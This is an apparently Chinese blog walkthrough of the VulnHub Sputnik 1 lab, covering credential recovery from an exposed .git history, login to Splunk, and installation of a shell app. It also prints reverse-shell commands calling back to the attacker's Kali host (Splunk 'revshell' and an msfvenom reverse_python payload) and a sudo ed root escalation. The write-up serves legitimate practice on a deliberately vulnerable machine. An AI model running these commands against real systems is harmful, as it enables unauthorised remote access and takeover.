vulnhub-Sputnik 1靶机

vulnhub:https://www.vulnhub.com/entry/sputnik-1,301/

导入靶机,放在kali同网段,扫描

image-20240927164246670

靶机在192.168.114.135,扫描端口

image-20240927164617346

开了三个端口,访问

8089的功能基本都要账户访问

image-20240927164731993

55555端口是个小游戏

image-20240927164918495

之前nmap还找到了一个目录/.git,其中的logs目录下的一个文件让我们去克隆一个项目

https://github.com/ameerpornillos/flappy

image-20240927165036709

61337是个登录界面

image-20240927165153335

克隆项目

git clone https://github.com/ameerpornillos/flappy

查看日志

git log

一一查看日志,最后找到在07fda135aae22fa7869b3de9e450ff7cacfbc717

image-20240927165943355

git ls-tree 07fda135aae22fa7869b3de9e450ff7cacfbc717

image-20240927170057056

git show f4385198ce1cab56e0b2a1c55e8863040045b085

image-20240927170116914

是账户名和密码

sputnik:ameer_says_thank_you_and_good_job

之前有个登陆界面,尝试登陆,成功

image-20240927170207118

通过在网上查找,这个splunk有一个利用工具

https://github.com/TBGSecurity/splunk_shells

下载,然后上传到kali,在网站内安装

image-20240927170540488

image-20240927170553616

image-20240927170605194

image-20240927170629348

上传完成后重新启动

image-20240927170646217

再次登录会直接来到软件管理界面,设置软件权限

image-20240927170816952

image-20240927170835942

设置完成后来到网站的搜索框,输入反弹shell命令

| revshell std 192.168.114.128 6789

image-20240927170958340

kali开启监听,获取到shell

image-20240927171405146

想要执行sudo -l得先获取交互式shell,使用msfvenom生成payload

msfvenom -p cmd/unix/reverse_python lhost=192.168.114.128 lport=9876 R

image-20240927171925894

监听9876端口,在原有的shell运行payload,获取到新的shell后生成交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

image-20240927172723408

sudo -l显示我们可以使用ed,查找漏洞网站使用方式

image-20240927172804215

只需要在ed里输入!/bin/bash

image-20240927172858081

提权成功,flag在/root文件夹

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值